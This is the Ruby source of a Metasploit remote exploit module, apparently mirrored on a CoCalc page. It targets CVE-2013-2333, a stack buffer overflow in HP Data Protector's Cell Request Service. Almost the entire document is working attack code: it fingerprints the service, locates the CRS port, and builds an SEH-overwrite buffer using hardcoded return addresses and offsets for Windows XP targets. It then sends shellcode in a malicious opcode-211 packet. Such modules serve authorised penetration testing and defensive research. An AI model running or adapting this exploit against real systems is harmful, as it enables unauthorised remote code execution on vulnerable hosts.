CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/misc/hp_dataprotector_crs.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'HP Data Protector Cell Request Service Buffer Overflow',14'Description' => %q{15This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector16product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell17Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested18successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.19},20'Author' =>21[22'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery23'juan vazquez' # Metasploit module24],25'References' =>26[27[ 'CVE', '2013-2333' ],28[ 'OSVDB', '93867' ],29[ 'BID', '60309' ],30[ 'ZDI', '13-130' ]31],32'Privileged' => true,33'Payload' =>34{35'Space' => 4096,36'BadChars' => "\x00\xff\x20" # "\x00\x00", "\xff\xff" and "\x20\x00" not allowed37},38'Platform' => 'win',39'Targets' =>40[41[ 'Automatic', {} ],42[ 'HP Data Protector 6.20 build 370 / Windows XP SP3',43{44'Ret' => 0x00436fe2, # ppr from crs.exe45'Offset' => 1557846}47],48[ 'HP Data Protector 7.00 build 72 / Windows XP SP3',49{50'Ret' => 0x004cf8c1, # ppr from crs.exe51'Offset' => 1557852}53]54],55'DefaultTarget' => 0,56'DisclosureDate' => '2013-06-03'))5758deregister_options('RPORT') # The CRS service runs on a random port59end6061def build_pkt(fields)62data = "\xff\xfe" # BOM Unicode63fields.each do |k, v|64if k == "Payload"65data << "#{v}\x00\x00"66else67data << "#{Rex::Text.to_unicode(v)}\x00\x00"68end69data << Rex::Text.to_unicode(" ") # Separator70end7172data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator73data << "\x00\x00" # Ending74return [data.length].pack("N") + data75end7677def get_fingerprint78ommni = connect(false, {'RPORT' => 5555})79ommni.put(rand_text_alpha_upper(64))80resp = ommni.get_once(-1)81disconnect8283if resp.nil?84return nil85end8687return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl88end8990def get_crs_port9192pkt = build_pkt({93"Opcode" => "2",94"FakeMachineName" => rand_text_alpha(8),95"Unknown1" => "0",96"FakeDomainUser" => rand_text_alpha(8),97"FakeDomain" => rand_text_alpha(8),98"FakeLanguage" => rand_text_alpha(8),99"Unknown2" => "15"100})101ommni = connect(false, {'RPORT' => 5555})102ommni.put(pkt)103resp = ommni.get_once(-1)104disconnect105106if resp.nil?107return nil108end109110res_length, bom_unicode, res_data = resp.unpack("Nna*")111112fields = res_data.split(Rex::Text.to_unicode(" "))113114opcode = fields[0]115port = fields[1]116117if not opcode or not port118vprint_error("Unexpected response")119return nil120end121122opcode = Rex::Text.to_ascii(opcode.chomp("\x00\x00"))123124if opcode != "109"125vprint_error("Unexpected opcode #{opcode} in the response")126return nil127end128129port = Rex::Text.to_ascii(port.chomp("\x00\x00"))130return port.to_i131end132133def check134fingerprint = get_fingerprint135136if fingerprint.nil?137vprint_error("Unable to fingerprint")138return Exploit::CheckCode::Unknown139end140141port = get_crs_port142143if port.nil?144vprint_status("HP Data Protector version #{fingerprint}")145vprint_error("But CRS port not found")146else147vprint_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}")148end149150if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/151# More likely to be exploitable152return Exploit::CheckCode::Appears153elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/154# More likely to be exploitable155return Exploit::CheckCode::Appears156elsif fingerprint =~ /HP Data Protector A\.07\.00/157return Exploit::CheckCode::Appears158elsif fingerprint =~ /HP Data Protector A\.07\.01/159return Exploit::CheckCode::Appears160elsif fingerprint =~ /HP Data Protector A\.06\.20/161return Exploit::CheckCode::Appears162elsif fingerprint =~ /HP Data Protector A\.06\.21/163return Exploit::CheckCode::Appears164end165166return Exploit::CheckCode::Safe167end168169def get_target170fingerprint = get_fingerprint171172if fingerprint.nil?173return nil174end175176if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/177return targets[1]178elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/179return targets[2]180else181return nil182end183end184185def exploit186187if target.name =~ /Automatic/188print_status("Trying to find the target version...")189my_target = get_target190else191my_target = target192end193194if my_target.nil?195fail_with(Failure::NoTarget, "Failed to autodetect target")196end197198print_status("Trying to find the CRS service port...")199port = get_crs_port200if port.nil?201fail_with(Failure::NotFound, "The CRS service has not been found.")202else203print_good("CRS service found on #{port}/TCP")204connect(true, {'RPORT' => port})205end206207pkt = build_pkt({208"Opcode" => "0",209"EndPoint" => "GUICORE",210"ClientFingerprint" => "HP OpenView OmniBack II A.06.20",211"FakeUsername" => rand_text_alpha(8),212"FakeDomain" => rand_text_alpha(8),213"Unknown1" => "488",214"Unknown2" => rand_text_alpha(8)215})216print_status("Sending packet with opcode 0...")217sock.put(pkt)218data = sock.get_once(-1)219220if data.nil?221fail_with(Failure::Unknown, "Error while communicating with the CRS Service")222end223224if Rex::Text.to_ascii(data) !~ /NT-5\.1/225fail_with(Failure::NoTarget, "Exploit only compatible with Windows XP targets")226end227228pkt = build_pkt({229"Opcode" => "225"230})231print_status("Sending packet with opcode 225...")232sock.put(pkt)233data = sock.get_once(-1)234235if data.nil?236fail_with(Failure::Unknown, "Error while communicating with the CRS Service")237end238239bof = payload.encoded240bof << rand_text(my_target["Offset"] - payload.encoded.length)241bof << generate_seh_record(my_target.ret)242bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{my_target['Offset']+8}").encode_string243bof << rand_text(100) # Trigger Exception244245pkt = build_pkt({246"Opcode" => "211",247"Payload" => bof248})249print_status("Sending malicious packet with opcode 211...")250sock.put(pkt)251disconnect252end253end254255256